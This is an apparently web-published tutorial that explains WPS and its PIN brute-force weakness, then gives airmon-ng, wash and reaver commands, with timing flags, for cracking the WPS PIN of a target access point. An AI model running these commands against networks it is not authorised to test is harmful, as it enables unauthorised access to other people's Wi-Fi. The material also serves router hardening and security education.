REAVER: Cracking WI-FI with WPS ENABLED

WPS is short for Wi-Fi Protected Setup and is a method of establishing a connection between a wireless device and a wireless router that was released in 2007. Typically to connect a wireless device to a router you need to know the router name (SSID) and its password. However, with WPS you could connect to the network using any of the methods below.

  • For devices that support WPS, you can enter the eight-digit WPS PIN on your wireless router to connect to the router.
  • If your wireless device has a WPS button of its own, you can press the WPS button on the router and then press the WPS button on your device to connect it to the network.
  • Press the WPS button on the router and then using a wireless device find and select the router to connect without having to enter a password.
  • For wireless devices that have WPS, you can enter the eight-digit generated PIN in your wireless router’s setup to connect the device.

Where is the WPS PIN or WPS Key?

The WPS PIN can be found on the back or bottom of the router. With most routers, the WPS PIN is on a sticker and is an eight-digit number.

Disadvantages with WPS

Although WPS can make it easier to connect wireless devices to your network, there are some distinct disadvantages of WPS.

  • If your wireless router is in an insecure area, anyone could press the WPS button on the back of the router and be able to connect to your network.
  • Because all WPS devices have a unique eight-digit PIN (technically seven since the last digit is a checksum), a hacker can use a brute-force attack on the router to identify the WPS PIN and then be able to connect to your network.
  • The WPS router PIN cannot be changed.
  • WPS only works with WPA or WPA2 security and does not support older devices with WEP.

Although WPS can make it easier to connect wireless devices to your network because of these disadvantages you may want to disable WPS through your router setup.

Reaver implements a brute force attack against WiFi Protected Setup which can crack the WPS pin of an access point in a matter of hours and subsequently recover the WPA/WPA2 passphrase. Specifically, Reaver targets the registrar functionality of WPS, which is flawed in that it only takes 11,000 attempts to guess the correct WPS pin in order to become a WPS registrar. Once registered as a registrar with the access point, the access point will give you the WPA passphrase.

Cracking WI-FI with WPS ENABLED

  1. Start wireless card  in monitor mode
    airmon-ng start wlan0

     

  2. See the list of networks that support the WPS.
    wash -i wlan0mon

     

  3. Using Reaver
    reaver -i wlan0mon -vv -b XX:XX:XX:XX:XX:XX

     

    Description

    -i wlan0mon this interface.
    -b XX: XX: XX: XX: XX is BSSID attacked point.
    -vv -v, –verbose Display non-critical warnings

    As there are additional useful options
    -t 2 – reduces response time (5 seconds by default) in this case to 2 seconds.
    -d 0 – the pause between attempts.

  4. Key found